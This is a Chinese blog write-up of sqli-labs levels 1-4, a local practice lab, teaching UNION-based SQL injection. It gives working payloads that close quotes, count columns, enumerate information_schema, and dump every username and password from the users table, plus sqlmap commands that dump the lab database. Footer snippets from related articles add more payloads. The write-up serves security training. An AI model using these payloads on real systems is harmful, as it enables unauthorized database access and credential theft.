Sqli-labs 1-4(union注入)

最新推荐文章于 2024-03-30 21:59:09 发布
最新推荐文章于 2024-03-30 21:59:09 发布
阅读量461 收藏 2
点赞数 1
分类专栏: # SQL注入 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43901998/article/details/105180482
版权

文章目录

1. Less-1

这道题考察的是Single quotes(单引号)
首先我们进入sqli根目录,打开Less-1页面。
less1
页面提示然我们输入一个id作为参数。
在这里插入图片描述
在这里我们输入了?id=1作为url的参数,然后我们通过改变不同的参数,后台会返回给我们不同的Login namePassword
通过以上测试,我们大概可以猜出,后台所返回的数据是由我们输入的id决定的。而这个id就是我们和sql语句进行交互的接口。我们需要通过这个接口,来得到这个数据库的数据。

1.1 判断id类型

在进行注入之前,我们首先要判断出网站后台id的接受形式(字符串,int等等)
由于这道题目的名字就是GET-Error-based-Single quotes获取基于单引号的错误。
首先我们输入一个?id=1'来验证一下我们的想法:
在这里插入图片描述
可以看到页面给出了报错信息:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘1’’ LIMIT 0,1’ at line 1

其中'1'' LIMIT 0,1为出错的语句(外面的两个单引号是包裹这个短句的,不是sql语句中的,因此忽略掉),然后我们去掉我们输入的1'就能看到''LIMIT 0,1为网站的原生sql语句。那也就是说明网站的id类型为单引号包裹的字符型。

那么我们首先猜测网站的sql语句为:
SELECT xxx FROM xxx WHERE id='';
因此我们需要闭合这个id,然后插入我们的payload
在这里插入图片描述
这里我是用的语句, 首先用and 1=1 --+进行测试,看页面能否返回正常的结果,然后使用and 1=2 --+。一个true一个false,页面应该会有不同的响应,当页面返回了不同的响应,那么就说明我们对于id类型的判断是正确的。然后就可以进行后续的操作了。

1.2 判断检索字段个数

在进行下一步的爆破时,我们首先要知道网站使用的sql语句中检索字段的个数。我们使用order by来进行判断。
我们输入?id=1' order by num --+然后查看网站的响应,如果正常就继续增大num的数值。我们发现当num到4时,网页给出了错误信息。
在这里插入图片描述
意思是我们要这个检索语句根据第四个字段排序,而该检索语句没有第4个字段,因此报错。与此同时,我们就能知道网站使用的sql语句的检索字段是3个,也就是SELECT xxx,xxx,xxx FROM xxx WHERE id='';
得知检索字段以后就可以进行下一步的操作了。

1.3 获取数据库信息

1.3.1 查询网站使用的数据库名

根据上面的内容,我们得知了网站id的类型以及检索字段,下面我们构造payload然后使用union将payload插入到网站sql中。
1' and 1=2 union select 1, version(), database(); --+
将这条语句插入到url中,就能得到如下界面:
在这里插入图片描述
到此为止,我们就知道,此网站使用的数据库版本是5.7.18-log,使用的数据库名称为security

1.3.2 爆破数据表

在拿到了网站所使用的数据库后,我们可以通过进一步的查询获知该数据库下的数据表和字段值。
我们使用如下语句获知security数据下所有的数据表。(关于为什么要使用这个语句,我会写在最后)
1' and 1=2 union select 1, (select group_concat(table_name) from information_schema.tables WHERE table_schema='security'), 3 --+
我们看一下结果:
在这里插入图片描述
现在我们知道security数据库下有4张数据表:emails, referers, uagents, users
根据猜测,我们应该知道所有的用户信息应该在users表中。那么下面,我们就查这张表的水表~~

首先我们要知道这张表都有什么字段?
1' and 1=2 union select 1, (select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),3 --+
插入上面的语句,可以得到:
在这里插入图片描述
因此我们就知道网站中security数据下users表中的三个字段为id, username, password

在拿到这个表中字段后,查他的水表是不是就很容易了~~
?id=1' and 1=2 union select 1, (select group_concat(username) from users), (select group_concat(password) from users) --+
在这里插入图片描述
可以看到,用户信息统统都给你爆到页面上了(什么用户隐私?都是骗人的!)

1.3.2 以上使用sql语句的介绍

在上面,我们使用了一些比较莫名其妙的sql语句,可能有些人没有科普过这方面的数据库知识所以就不明白为什么,我在这里讲解一下:
首先罗列出上面使用的sql语句。

  1. 1' and 1=2 union select 1, (select group_concat(table_name) from information_schema.tables WHERE table_schema='security'), 3 --+
  2. 1' and 1=2 union select 1, (select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),3 --+

在这里,使用了information.tablesinformation_schema.columns这两张表。

我们来介绍一下:
在mysql中,为了便于对数据库的管理,你会发现在mysql中有一个自带的数据库information_shcema,这里面有很多的数据表。而其中有3张记录了你这个DBMS管理的所有的数据库名,表明,字段名。

  1. schemata 表
    schemata表中有一个schema_name字段,存储了当前DBMS所管理的所有数据库的名字。我们可以通过查询这个表,获知你所有的数据库名。

  2. tables 表
    tables中的table_schematable_name字段,分别记录了数据库名称和该数据库下数据表的名称。

  3. columns 表
    columns中的table_schema, table_name, column_name字段,分别记录了数据库名,数据库下数据表的名,数据表下字段的名称。

因此,我们通过这3张表就能知道你DBMS下管理的所有数据库的名字,以及每一个数据库下有多少表,表中都有什么字段。

2. Less-2

Less-2和Less-1的操作过程几乎完全一样,感兴趣的小伙伴可以自己试一下。看能不能把他的users表摔在页面上!

提示:
Less-2和Less-1唯一的区别就是id类型不同了,Less-2的id是一个int类型。因此这里的sql语句可能就是SELECT xxx FROM xxx WHERE id=1;
然后套用上面的语句就行了,具体过程不在给出,直接给出最后查水表的语句吧!
?id=1 and 1=2 union select 1, (select group_concat(username) from users), (select group_concat(password) from users) --+

3. Less-3

Less-4和Less-1也是基本雷同,仅仅id类型不同:
SELECT xxx FROM xxx WHERE id=('1');
这里的id是用单引号+括号包裹的。因此我们在闭合的时候要注意,直接给出最后查水表的语句:
?id=1') and 1=2 union select 1, (select group_concat(username) from users), (select group_concat(password) from users) --+
在这里插入图片描述

注意:
有时候可能我们输入了正确的注入语句,但是页面没有给出正确的响应,问题的原因我也不清楚,但是你再重置一下这个sqli的数据库能够解决大部分的问题。
在这里插入图片描述

4. Less-4

在Less-4中,我们先输入?id=1'发现没有错误信息显示,别急,再试一下?id=1",就有了。
在这里插入图片描述
根据报错信息,我们就能够知道这个id使用双引号+括号包裹的。
SELECT XXX FROM XXXX WHERE id=("1");
其他步骤和Less-1一致。
最后给出查水表语句:
?id=1") and 1=2 union select 1, (select group_concat(username) from users), (select group_concat(password) from users) --+

5. SQLmap通关

SQLmap是一个SQL注入的工具。熟练的掌握SQLmap的用法,也是提升我们注入能力的一个方向。

这里拿Less1来试刀。

获取当前的数据库名称:

sqlmap.py -u http://127.0.0.1:7788/sqli/Less-1/?id=1 --batch --current-db

在这里插入图片描述
其中---batch就是采用默认选项进行注入。--current-db表示查询当前使用的数据库的名称。

查数据表

sqlmap.py -u http://127.0.0.1:7788/sqli/Less-1/?id=1 --batch -D security --tables

在这里插入图片描述
-D为指定被查询的数据库,--tables表示查询数据表的名称。

查列名

sqlmap.py -u http://127.0.0.1:7788/sqli/Less-1/?id=1 --batch -D security -T users --columns

在这里插入图片描述
-T为指定被查询的数据表。--columns表示查询所有的列名。

查询值

sqlmap.py -u http://127.0.0.1:7788/sqli/Less-1/?id=1 --batch -D security -T users --dump

在这里插入图片描述

老司机开代码
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入 sqli-labs部分解析
ziwenya的博客
08-31 612
sql注入基础操作及相关sqli-labs关卡通关流程
sqli-labs实验指导手册
11-17
1. **字符型联合注入**(如less-1): - **注入点检测**:通过修改查询参数(如?id=1' and 1=1),观察页面响应变化来判断是否存在注入- **闭合方式判断**:通过输入特殊字符(如\)来测试闭合方式,确认是单...
SQLI注入Union注入
CP1024的博客
06-20 165
简单的Union注入 1.MySql注入常用函数: 函数名称 函数功能 system_user() 系统用户名 user() 用户名 current_user() 当前用户名 session_user() 连接数据库的用户名 database() 当前数据库名 version() 数据库版本 @@datadir 数据库路径 @@basedir 数据库安装路径 @@version_compile_os 操作系统版本 count() 返回执行结果数量 co
sqli-labs系列1~4关【union select】
学海无涯苦作舟
09-08 257
打开sqli-labs第一关,页面显示如下 【任务:找出用户的id和password】 2.在url中输入?id=1后,页面显示如下(黄字能让我们更直观的看见执行语句)显示如下 3.首先输入?id=1 and 1=2 --+【页面回显正常,说明不是数值查询】 (--空格)在sql中代表注释,但是在url中加上空格在浏览器发送请求时会把空格舍去,所以用--+代替,原因是+在被编码后会变成空格 4.既然不是数值查询,那么我们可以试试是不是字符型注入,输入?id=1'后页面显示不正常 5.输...
sql学习1(union注入和报错注入
最新发布
cyy001128的博客
03-30 980
id=1' or extractvalue(1,right(concat('~',(select group_concat(column_name)from information_schema.columns where table_name='users'),'~'),32))%23 //右侧末位32字符。id=1"--+,正常,再输入?id=1" and "1"="2 报错,说明是双引号注入。id=1' and '1'='2报错,说明是单引号注入;id=1 and 1=1正常,输入?
SQL注入——union获取数据库信息
m0_71714379的博客
02-05 1195
web安全学习笔记
sqli-labs.rar
06-30
"sqli-labs.rar" 提供了一个专门的练习平台,帮助用户深入理解SQL注入的工作原理以及如何防范这种攻击。 在"SQL注入"这个主题中,你需要掌握以下几个关键知识点: 1. **SQL注入基础**:了解SQL注入的基本概念,它...
sqli-labs-master靶机
10-12
【SQL注入实验室(sqli-labs)详解】 SQL注入(SQL Injection)是一种常见的网络安全漏洞,攻击者通过在Web应用程序的输入字段中注入恶意SQL代码,从而获取、修改、删除数据库中的敏感信息,甚至完全控制数据库...
SQL注入天书 sqli-labs
01-11
4. **联合查询注入**:利用UNION操作符合并两个或多个查询,以显示非预期的结果。 5. **堆叠查询注入**:通过构造多条查询语句并用分号分隔,一次性执行多个查询。 6. **信息收集**:学习如何获取数据库版本、表名...
sql注入 union联合查询注入(超详细)
jiji_king的博客
04-04 1万+
sql注入 union联合查询注入 我们以sqli-labs的第一关为例,来具体理解union联合查询注入的方法,理解每一步我为什么要这么去做。 好的,我们开始第一关! 首先查看sqli-labs第一关 这是第一关初始界面,在url界面输入?id=1 发现有回显,给我们回显了两个数据 当我们输入?id=1’ 时出现了语法错误,表示这里可能存在语法漏洞,我们进一步探索 当我们输入 ?id=1’ --+ 时,又回显正常,然后我们用 ?id=1’ and 1=1–+ 回显正常,?id=1’ and 1=2–
2.1 union联合查询注入
n0d_xy的博客
04-14 1309
简介:文章分为三部分:1、概要;2、详细的思维导图;3、详细的解说。 描述:概要包括该文介绍的知识点;详细的思维导图更好地理清思路,方便记忆,但对于有些对于作者比较基础的内容不会有详细的解释,建议主动了解;详细的解说作者会根据思维导图的纲要添加代码语句等内容,有时间会添加具体操作,具体步骤,操作结果等内容,添加需要注意的Tips(蓝色字体怎样)。 前面的话:操作学习的环境----Linux环境...
sqli-labs闯关指南 1—10
18年3月萌新白帽子
06-18 5万+
如果你是使用的phpstudy,请务必将sql的版本调到5.5以上,因为这样你的数据库内才会有information_schema数据库,方便进行实验测试。另外-- (这里有一个空格,--空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用--+代替-- ,原因是+在URL被URL编码后会变成空格。第一关1.经过语句and 1=2...
sqlilabs教程(1-10)
一个安全研究员
04-18 3万+
前言 最近在研究sql注入,只是看书有点无聊(不推荐大家去看《sql注入攻击与防御》,这本书的翻译很奇怪,而且内容不太适合小白,可以当小说看) less-1 根据提示,可以知道只是个单引号注入的题目,我们在参数后面加一个单引号看下效果: 可以看到数据库报错了,最重要的就是能够看懂数据库的错误信息,从错误信息中我们可以知道是单引号的匹配出了问题,也就是说我们添加的单引号成功被...
SQL注入学习之union联合查询注入
LTNSLALALA的博客
06-13 4302
文章主要是对SQL注入中基于union联合查询注入方式的实践记录。
SQL注入篇——sqli-labs最详细1-40闯关指南
爱国小白帽
01-11 3万+
使用sqli­labs游戏系统进行sql注入 1.首先确定用哪些字符可以进行sql注入 一.选择Less­1进入第一关,在网址中添加标红内容,显示了用户和密码 http://localhost/sqli­labs­master/Less­1/index.php?id=1’ and 1=1 ­­ ­ 把1=1改成1=2,不报错也不显示任何信息,说明可以利用 ’ 字符注入 二.进入第二关,在网址中添...
两个结构相同的表通过union连接称为一个表,然后在对新的表进行处理
道法自然
04-28 4429
SELECT x.AssetId,SUM(x.Amount) AS Amount,AMS_assets.[name]    FROM (   (   SELECT AMS_Plan_Item.asset_id as AssetId ,AMS_Plan_Item.amount AS Amount  FROM AMS_Plan_Item  INNER JOIN AMS_Plans_Normal t
sqli-lab学习笔记(学习笔记)(21-30)
大方子
08-21 5845
  打完21-30之后的后记:   后来发现,网上所有就是讲解sqli的,到后面都没有用查有多少字段数的order by这个语句,几乎都没有提到过,我自己也尝试在后面的变形中加入加入进去但是不知道为什么老是出错,现在我想到的办法就是   比如28a关   语句是这样的 http://10.10.10.141/sql/Less-28a/?id=0')UNion%a0SElect%a...
SQL注入——联合注入
初见辉少
07-12 964
SQL注入原理:攻击者通过构造不同的SQL语句来实现对数据库的操作 SQL注入的本质:我们也能操作别人的数据库 数据库结构:库:就是一堆表组成的数据集合 表:类似Excel,有行和列组成的二维表 字段:表中的列称为字段 记录:表中的行称为记录 单元格:行和列相交的地方成为单元格 在数据库里有一个系统库:information_schema 在他里面有个存放所有库名的表:schemata schema_name 库名 ...
sqli-lab教程——1-35通关Writeup
热门推荐
地址ch3nye.top
09-11 10万+
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的 sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges) Less-1 ...
SQL注入实战:sqli-labs实验详解
"sqli-labs实验指导手册详细介绍了如何通过搭建sqli-labs实验平台来学习和实践SQL注入攻击及防御。本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值